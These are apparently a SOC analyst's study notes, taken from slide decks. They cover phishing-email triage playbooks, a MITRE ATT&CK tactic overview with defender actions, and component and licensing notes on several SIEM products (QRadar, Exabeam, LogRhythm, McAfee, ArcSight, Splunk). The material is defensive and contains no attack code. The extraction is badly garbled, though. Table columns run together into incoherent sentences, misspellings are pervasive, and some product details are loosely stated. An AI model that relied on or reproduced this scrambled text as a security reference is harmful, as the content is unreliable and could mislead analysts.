b) If it is non malcious then we have to go further investigation

3) Header analyzer SPF Dmarc is passed DKim passed

Dmarc is failed DKIM passed
DMarc is passed DKIM is failed

DMARC SPf passed DKIM is failed

spf failed DKIM is paased
SPF passed DKIM passed

DMARC IS
DKIM SPF is paassed passed
DMARC is
SPF is failed passed
dmarc IS
SPF is passed FAILED
Block the URL in the NGFW or
Malcious URL link 1) Malcious URL link Proxy

Just go for t=further

2) malcioud URL link non malcious investigation

Check the repuration of thwe hash Block the hash value in the
5) Malcious Malware atatchment value 1) Malcious edr/xdr/av TOOL

Based ont eh above paramters

classfithe phsiing email as
malious phising emao or non
2) nON mALCIOUS phsong email

6) Manual Header analysi Verify the manula HTML header analysis SPF
DMARC
DKIM
Return path
ip address
domin name
content of the bdoy
URL link
Hash value

2) Spear Phishing email 1) False spotive

2) true postive

1) Try to verify one user is

recived or group of the user
False spotive recived
Network id
Mesaged id
Subject line
Sender email
address

Verify the action of the log

soiurce in Blocking or Quarantine
EMail GW
NGFW
EDR
Proxy

Additonally verify C2C There is non

outbound conenctions c2c connections

1) Try to verify one user is

recived or group of the user
recived
2) True Positive Network id
Mesaged id
Subject line
Sender email
address

Verify the action of the log

soiurce in Allow
EMail GW
NGFW
EDR
Proxy

Outobound
conenctions
from internal
end user or end
users to C2C
Additonally verify C2C commond and
outbound conenctions controller

Network
Containment isolation
Outlook
Remediation password reset
DLP logs

3) Whaling Phishing email

1) False spotive
2) true postive

1) Try to verify one user is

recived or group of the user
False spotive recived
Network id
Mesaged id
Subject line
Sender email
address

Verify the action of the log

soiurce in Blocking or Quarantine
EMail GW
NGFW
EDR
Proxy

Additonally verify C2C There is non

outbound conenctions c2c connections

1) Try to verify one user is

recived or group of the user
recived
2) True Positive Network id
Mesaged id
Subject line
Sender email
address

Verify the action of the log

soiurce in Allow
EMail GW
NGFW
EDR
Proxy

Outobound
conenctions
from internal
end user or end
users to C2C
Additonally verify C2C commond and
outbound conenctions controller

Network
Containment isolation
Outlook
Remediation password reset
DLP logs

3) Malcious URL Phishing email (Single user) and multiple users

Analyuse all the

analysis and
upload
eveidences and
1) Malcious close the
1) False psotive 1) URL validation ' URL Block or quarantine incident
Analyuse all the
analysis and
upload
2) Non eveidences and
malICIOUS close the
URL Allow/ clean incident

ITIL process or NIST frameowrk

Blocking of the URL link RCA analysis
Blocking of IP Address and disucss
Reset passwords with the tem
Verify the FW Re run the AV scans mebers and
logs and also C2C DLP logs data copied byu the attacker or not Verify the back up finally present
User clicked or eMAIL gw AND conenctions to Verify the atatcker sent an emails to other Brinign ti back abornaomal to normal to customer or Securtiy awareness training to all the users and also
2) True Positive 1) URL validation 1) Malcious SIngle user not ngfw LOGS atatcker Containment of the end use rmachine end users onbehalf end user client phsjing email campiagns
 Verify the FW Blocking of the URL link RCA analysis
logs and also Blocking of IP Address and disucss
eMAIL gw AND Reset passwords with the tem
ngfw LOGS Re run the AV scans mebers and
How many Identify the all DLP logs data copied byu the attacker or not Verify the back up finally present
Multiple user or users or cliked the users C2C Verify the atatcker sent an emails to other Brinign ti back abornaomal to normal to customer or Securtiy awareness training to all the users and also
Multiple users cliked or not on clicked on coominicatioj Containment of all those machines end users onbehalf end user client phsjing email campiagns
Verify the C2C
comjunications
from the internal
How many users to
users did not Identify the all external
click on the infrmation atatckers False psotive

3) Malcious Malware attachment Phishing email (Single user) and multiple users
Single user did
1) Single user EDR/AV/XDR not click on False spotive
Verify the
Outbound
coinnections
from the victim
ip to C2C
Single user and atatcke rip
EMAIL GW clicked on False spotive address
NGFW
User is clicked
AM on True Positve Allow Verify the outbound connections
brinnging it
back from Create RCA analysis document as reference document
abnormal to or submitting customer in future purpose. Then review
Malware anysis Verify the latermovement its happend Block the ip address of the atatcker in normal the document wth internal team members and also to
tool or not containment the NGFW oiperations external customers
Verify the previlege escalation attack Block the hash value in the edr/av/xdr
its happend or not tool
Verify the ene d user outlook
accoutnis there any outbound
connections as emails are going to
internal employess of the Reset password of the victim user
organization credetnials
verify is there any previlege escaltion
attack its happend . The change the
Verify the data efilteration it is admin credentials by restiing the
happend or not password
Verify the lateral movement its
happend to ither end susrd s and
diconnect from the network
verify is there any data copied by the
atatcked as a data exfiltration

100 users are Users clicked EDR/NGFW/AM Verify the outbound conenctions from
1) Multiple users recived on ASction blocked /AV/XDR the victim ip to C2C atatcker ip False sptive
those emails delete from the Email GW
or SMTP server. Delting of the email
Users did not from the centrelaised email GW or
click on False sptive SMTP server is called as Email pruging
Users clicked EDR/NGFW/AV Verify the outbound conenctions from bRINIGN TIT BACK TO ABRONAOMARL TO NORMAL Create a rca Awareness
on Allow /AM the victim ip to C2C atatcker ip True Positve Latermeovement verified Containbment OPERATIONS document provide
Block the ip Submit the
Previlge escalation from the user to address in the report to client
Hash value veriftation admin account NGFW or customer
Block the hsh
NGFW and DLP logs is there data value in the edr
exfiltration tool
Reset the
password to
raise ticket to
Outool team
 WHAT IS MITRE ATT&CK Framework?

The MITRE ATT&CK Framework is a structured, detailed knowledge base of attacker

behaviors. It maps tactics (why), techniques (how), and procedures (specific steps)
used by real-world adversaries—helping SOC analysts detect, prevent, and
respond effectively.

1. Initial Access

1. What is it?

How attackers first get access to a system or environment.

2. What can an attacker do?

- Phishing (T1566) – Tricking users with fake emails

- Spear Phishing Attachment (T1566.001)
- Spear Phishing Link (T1566.002)
- Exploit Public-Facing Application (T1190) – Attacking vulnerable web apps

3. What can a SOC analyst do?

- Implement email filtering and phishing simulations

- Regularly patch public-facing apps
- Monitor for exploit attempts and suspicious logins

BY HARSH KADU
2)Execution:

1.What is it?

How attackers run malicious code.

2.What can an attacker do?

PowerShell (T1059.001): Using the PowerShell command-line tool to execute

malicious scripts.
Command and Scripting Interpreter (T1059): Using script interpreters like Bash,
Python, or JavaScript to execute code.

3.What can a SOC analyst do?

- Monitor script interpreter usage
- Use EDR tools with command-line visibility
- Restrict PowerShell use and log all activity

3)Persistence:

1.What is it?

How attackers stay on a system even after a reboot.

2.What can an attacker do?

Scheduled Task/Job (T1053): Setting up tasks or jobs to run malicious code at

regular intervals.
Boot or Logon AutoStart Execution (T1547): Configuring the system to execute
malicious code upon startup.

3.What can a SOC analyst do?

- Monitor system changes and scheduled tasks

- Restrict admin privileges

- Use persistence-detection rules in SIEM

BY HARSH KADU
4)Privilege Escalation:

1.What is it?

How attackers gain higher-level permissions.

2.What can an attacker do?

Exploitation for Privilege Escalation (T1068): Exploiting vulnerabilities to gain

higher-level permissions.
Valid Accounts (T1078): Using legitimate credentials to escalate privileges.

3.What can a SOC analyst do?

- Apply security patches

- Monitor for privilege escalation patterns
- Alert on unusual account activity

5)Defense Evasion:

1.What is it?

How attackers hide their activities.

2.What can an attacker do?

Obfuscated Files or Information (T1027): Hiding malicious code using techniques

like encoding or encryption.
Disabling Security Tools (T1562): Turning off antivirus or other security tools to
avoid detection.

3.What can a SOC analyst do?

- Alert on AV/EDR service termination

- Detect file obfuscation techniques
- Harden systems to prevent tampering

BY HARSH KADU
6)Credential Access:

1.What is it?

How attackers steal login details

2.What can an attacker do?

Credential Dumping (T1003): Extracting account credentials from the operating

system.
Keylogging (T1056.001): Capturing keystrokes to steal usernames and passwords.

3.What can a SOC analyst do?

- Monitor LSASS access

- Use credential guard and secure boot
- Detect anomalous login behavior

7)Discovery:

1.What is it?

How attackers gather information about the system.

2.What can an attacker do?

Network Service Scanning (T1046): Scanning for open ports and services on the
network.
System Information Discovery (T1082): Gathering details about the operating
system and hardware.

3.What can a SOC analyst do?

- Log and analyze network scan attempts

-Restrict unnecessary protocol access

BY HARSH KADU
8)Lateral Movement:

1.What is it?

How attackers move through the network.

2.What can an attacker do?

Remote Desktop Protocol (RDP) (T1021.001): Using RDP to move laterally between
systems.

3.What can a SOC analyst do?

- Monitor RDP usage and failed login attempts

- Use network segmentation
- Alert on unauthorized remote access

9)Collection:

1.What is it?

How attackers collect data (e.g., copying files).

2.What can an attacker do?

Data from Local System (T1005): Collecting files and information stored on the
local machine.
Input Capture (T1056): Capturing user input like keystrokes or screen captures.

3.What can a SOC analyst do?

- Detect large file access or copies

- Use DLP and endpoint monitoring
- Monitor clipboard, keystroke behavior

BY HARSH KADU
10)Command and Control (C2):

1.What is it?

How attackers communicate with the compromised system.

2.What can an attacker do?

Application Layer Protocol (T1071): Using standard web protocols like HTTP or
HTTPS to communicate with compromised systems.
Remote Access Software (T1219): Using legitimate remote access tools for
communication and control.

3.What can a SOC analyst do?

- Analyze network traffic for anomalies

- Monitor outbound connections and DNS tunneling
- Block unauthorized remote software

11)Exfiltration:

1.What is it?

How attackers steal data (e.g., transferring files out of the network).

2.What can an attacker do?

Exfiltration Over C2 Channel (T1041): Using the command and control channel to
exfiltrate data.
Exfiltration Over Web Service (T1567): Sending stolen data to an external web
service.

3.What can a SOC analyst do?

- Use DLP tools

- Monitor unusual outbound traffic

BY HARSH KADU
12)Impact:

1.What is it?

How attackers cause damage (e.g., encrypting data with ransomware).

2.What can an attacker do?

Data Encrypted for Impact (T1486): Encrypting data to render it unusable, often
seen in ransomware attacks.
Data Destruction (T1485): Deleting or corrupting data to disrupt operations.

3.What can a SOC analyst do?

- Implement backups and versioning

- Monitor for mass encryption or deletion
- Have a tested incident response plan

BY HARSH KADU
 Crowdstrike
Force point DLP
O365
Etc
IBM q radar will provide out of box
test causes or use cases for testing
of correlation rule or condition or
Building blocks ( BB) algorithm

Example 1) From the diabled

accoutn lig in failures are occuring
2) From the terminated account log
in failers are coming
3)Impossible traversal atatcks for
VPN
4) Multipel authication log in failures
from the same source ip
5)Multipel authication log in failures
from the same source user
6) Virus detected
7)Malware detected

Note : BB or building blocks are

subset of CRE rule creation
BB will not provide any alert or
iffense nitification

The difference building blocks and

Correlation rules, BB will not provide
any security notification as incident
but it can be used for testing of the
use case or correlation rule . On the
other hand Correlation rule will
What is the difference between building blocks and correelation provide security incient noitification
rules ? as a offense

It is centralised management app

where we can see CPU utlization,
RAM utilization, Mermory utlization,
UEBA, threat htning, Node , tHRreat
IBM App host intelligence feeds information etc

It will provide regular threat

intelligence news information ,
atatcks information , vulnerabitlies
IBM X force information doing by the adversaries

There two different two different

ypes of TFI of IBM X force
It is mainly for reputation
check of IP adreess, domain
validation and also URL
1)Open source validation
Customers will get regular
2) Commerical feed threat intelligences or feeds

There are two different ypes of

dashbaords can be created under
Dashboards IBM Q radar
1) Default
2)Customized

Security posture of the

Default dashbaords organization
Threat summary
Application summary
Network summry
Asset summary
Risk information
Asset identifcation
Offenses sumamry

Customized one Health check status

Firewall denied activity
Firewall allowed actvity
IDS/IPS allowed activity
EDR/XDR quratine activity
Application out bound
information

How to create cutomised dashbaords Go to log actvity

1) Write or filter based on Basic or
advanced search using AQL or
PGSQL ( Evrything drop downlist) Data source WAF
QID - Q radar ID
OWASP TOP 10
2) save

Go back to dashbaord and create

new dashbaord based on the query
created

Reports Deafult
Custoized

Custoized reports 1) Technical reports

2)process orinted reports

Technical reports heath check up status

Firewall denied actvoty
WAF firewall OWASP TOP 10
categroy of the atatcks
EDR related reports
DLP related reports

1) 1 day How many offences

Process orinted reports are Closed
WIP
Onhold/Pending
Cancelled
New
Total number numbe rof the
2) Weekly offences count
Clsoure of the offenses
Onhold/Pending
Cancelled
New
3) monthl
4)Quaertly
4)Annual

Comarision (Week on week)

Reports or Month on month
Bar chart
Pie chart

Alis of unique values can be

Q radar reference set used for various purposes
1) Cmapring property values
String the business data
Stroing the external data
Keep watch lists
Under the correlation rules
Defining the rules under rule response
Searchesing

Couple of exmplaes of
reference sets are Source ip
destination IP
Source mac
destination mac
Event id
Source port
Destination port
Event time stamp
Domain name or host name
or computer name or FQDN

By default q radar suggesting

based best on practces its
beteer use reference set as
IP address
 This app will monitor Q radar
deployment integlugence
historical data on the host
basis and also q radar metrcis
like perfoemce issues, health
issues ( BW utlization, cpu
utlization, ram utlization etc),
QDI ( Q radar deployemtn event rates information, flow
intelligence) rates information etc

This id is equivanelnt
windows id in the windows
QID ( Q radar id ) OS.
Same Q radar also it will
manaintain Q radar id for
dfiiferent types of actions.
Those actions or actvities are
1) Differretn types categroy of
the atatckjs ( based on the
signature wise )
2) Based on application
3)Based on the performance
4)Based on configuration or
setp or implementiorr or
adminsitaration

This app it will provide

information about q radar
network traffic analysis and
also network attacks
information like Spoofing,
flooding categroy of the
QNI ( Q radar network insights) attacks

Under offences tab we can

Correl;ation rule creation create correlation rule
1) Events
2) Flows
3) Events and flows
4) Offences (Exsiting 10000/sec rate limt or
correlation rule) DOS atatck throtting DB server Q radar cre rule
SNOW, Jira, Sharewell, HP,
ITSM , manage engine,
Case management 1) Third part case mamanagement Remedy, BSD etc
Witn in the tool itself we can
do overall new to still the
2)Inbuilt case menegtmnt closre of the incident
My business
20000/sec PGSQL requirement

2) Exabeam ( Query based )

Exabeam architecture digram or
components
1) Data lake ( Pool of the logs ) Deeper investigation
Coreelation rule creation
Fecting the data or querying
the data using SQL queries
Redcuing the false psotives
Adminsiration
Conext table creation
Implmentation
Node will do processing of the
2) Node ( Log processor) logs
Stroing of the logs
Filtring
Quering
Indexing
CRE
3) Exabeam log collector Collection of the logs
Aggregation
Parsing
Normalization
Threat hutning, SOAR, UEBA
, Adminitration, Corrleation
4) AA ( Advanced analytucs engine ) rule creation

Backend process ( How the alert will

be triggered)

Licensing GB/DAY ( Total EPS count)

Total Number of end users

Firm versions or OS
Deployment versions
1) Hard based 2000,3000,4000,5000 etc Data lake i47, i59,
Node= 1000, 2000 and 3000 Node
AA ( Adavanced analytics
4000, 5000 and 6000 engine) i
2)Software

Implementation
1) Stand alone
2)Distriubed

Features or Licensing
1) Node
2) UEBA
3)Threat hunting
4) SOAR- Incident rrspinder
5) Cloud connector ( Thirs party-
Skyformation, IBM , Oracle, Citrix
Fortigate etc)
6) Premium support
7) Adavanced analytics engine
7) Threay intelligence ( GTI- Global
Threat intelligence)

Note: From exabeam data leake we

can integrate pool of the logs other
SIEM tools vendor as well

Backend query lkanaguage or data

base 1) SQL

Common event format CEF

Incident score or risk score or alert Low, Mediul, High and

score >90 incidents consider as critical

Based on pur business

requirement under the data
elake we have to a give query
and save under the
visulaizations and fecth the
Visulaizations data from the dashbaord

To integrate AD ( LDAP ) to
know about whenver any
security incident is trigggred
who has done what and also
it will igve the details deatils
Context tables team hirearchicy as well

Based on the correlation

rule or Polciy or condition
Risk score under exabeam >90 Medium, High and critical algorithm or risk score
<90 we will consider low and
info and we can ignore these
incidents
 bo tht esearch file dunder
adavnced analystics and try
to get threat hunting based oj
manual way using Event id,
segmentation, log dource or
dats rouces, scource ip,
dentnatipn ip, action of the
Threat hunting data source ana dso on

Incident name under exabeam Incident only

Data lake or seach heads or

* (Exabeam, Sentinel, ELK, pool of the logs of search ;
Securonix and Splunk) All logs logs

3) Logrhytm (Not query)

9493218563
It will collect logs from different types
of log sources and it will complete
aggregation, parsing and
LR (Logrhythm) 1) LC (Log collector) nomralization
It will complete processing of the
logs and also it will complete
indexiing, querying and also filtering
and additonally it has AIE
2) LM (Log manager )( DP &DI) (Advanced analytics engone)
SOC team operations (L1,L2 and l3
investigations), UEBA, threat
hutning, Cloud AI, , Alarms (0-100) ,
3) EM & PM ( Event manager and platform mansagaer) Report and admin

Logrhythm backend process

LR integration methods or LR onaborading emthods 1)Syslog

2)Colelctro agent
3)WMI
4)API
5) Cloud connector method

Deployment Stand alone

Distubuted
Cloud

Impelemntations 1) hardware
2)Software
3)All in one box
4)Cloud
Alerets or incidents Alarms (01-100) scale ranage

Alarm it is triggered 0-100

80-100 Critical P1
60-80 High P2
40-60 Meidum P3
<40 Low and Info P4 and p5

AIE ( Adavanced analytics engine) 1) Default correlation rules

2)Customized correlation ruel

Features and licensing of logrhythm

1) UEBA
2) Threat Hutning
3)SOAR - Logrhym SOAR
4) Premium support
5) GTI- Global Threat intelligence

Backend query language used LR SQL

Common event format name CEF

Log integration methods Syslog

Colelctor agent
Cloud conenctor
WMI
API token method

4. Mcafee ( Not query based tool)

1) ESM- Enrerprise security
Mcafee SIEM tool components or Architecture digram manager
2) ELM - Event log manager
3) ERC - Event reciever

Backend process

Additional licenses or features or Modules 1) Storage

2)DAM
3)APM
4)GTI
5)UBA
5)Threay hutning
7)SOAR
8)premium support

Depkoyment 1)Standalone
3)Distubiuted
3)All in one box

Impelemtnation Hardbased
Softare
Cloud

Log integration methods 1) Sylog

2) Collector agent ( ERC)
3) Cloud connector
4) API token method
5)WMI

Risk score incident score or Alrt score 0-100

Critical 80-100
High 60-80
Medium 40-60
Low 20-40
Info 0-20

Backend database SQL

Common event format name CEF

Cortrelation ruel engine CRE engine

HP Ac sight (Micro focus )

 HP hardware and CSC DXC or HP enterprise
HP software and Microfosus Microfus

Small and Medium scale

TWo differen types of SIEM tools on HP arch sight 1) HP arch sight express industiries
2)HP archsight ESM Enterprise level

HP arch sight components 1) ESM or SIEM console GUI

2) LM
3) LC ( Smart connector and Flex
conenctors )

Backend process

Log integration methods 1)Syslog

2)Collector agent
3) WMI
5)MSRPC
5)Cloud connector
6)API token methods

Log cllectors There are types of log collectors

Smart connector will support
aggregation, normalization
1) Smart connector and known log format parsing
It will suport aggregation,
normalization and unknown
2) Flex conenctor log format logs parsing

Addtional licensing 1) Flow colelctor

2) Risk Manager
3) UEBA
4)Threat hunting
5)SOAR
6)Premium support
7)GTI- Global Threat intelligence

Incident score/Alert score Critical 80-100

High 60-80
Medium 40-60
Low 20-40
Info 0-20

Event format CEF( Common event format)

Backend database SQL

Deplpyment 1) Standalong
2)Distibuted

Implementation 1) Software

Threat
Hutning/SOAR/UEBA/report/
Case management/Risk
There are two consoles Investigation console Manager
Dahsboard/Report/CRE /
ACC- arcsigth command center Admin

Splunk
Splunk is merged with Cisco or acquired by Cisco

Splunk cpmponets or architecture diagram 1) Splunk forwarders ( Search forarders ) 1) Universal

2)Light weight
3)Heavy weight forwarder
2) Srach indexers
3) Search heads ( SIem console, GUI , user console )

Backend process of aplunk

Log integration methods 1) Syslog 514

Win colelctor agent or unix colelctor
2) Colelvtor agent ( Splunk forwarders) agent method 443,8443, 9093
Clpoud service providers logs to
3) Clud connector SIEM tool
4) Apps method ( Customized apps for each and every vendor)
5) API token method Saas based applications

Splunk backend programming language SPL- Splunk programming lanaguage

*= all logs
Bollean algebra functions = AND or OR or NOT

Additional licensing or componetsn or features 1) Splunk cluster High avability

It can be used how many
forwwarders or indexewrs and
procerros are qrequired in each and
2)Deolpument server every location
It is centlaised license manager and
it can be used to manage the lices
either for standlone deployment or
3) License manager distibuted eplyment
4) UEBA
5) Threat hunting
6) GTI- Global threat intelligence
7) Apps method
8) Premium support
9) SOAR- Phantom

Splunk deployment Standlaone

Distubuted deployment

Implementation Hardware
Software
Cloud

Logformat CEF- Common event format

Correlation rule engine CRE

Backend query lanaguage SPL - Splunk programming lanaguage

Incident name Alert or incident

Spluk it will support Inbulit case management

Thirdf party case manegemtn as well

Splunk forwarders or search forqwrders Mainly it can be used

1) Aggregation
2) Normalization
3) prasing

Splunk forwzrder types are 1) univerdsal

2)Light weight
3)Heavy weight

Feature Universal forwrder Lightweight Heavy weight

It will do only colelction of the logs,
aggragtion, and also it will Data prasing, indexing,
normlaization but it will not do Light data oparsig, collection, parsing , aggrgation,
fucntionality parsing aggragtion and nromalization normlization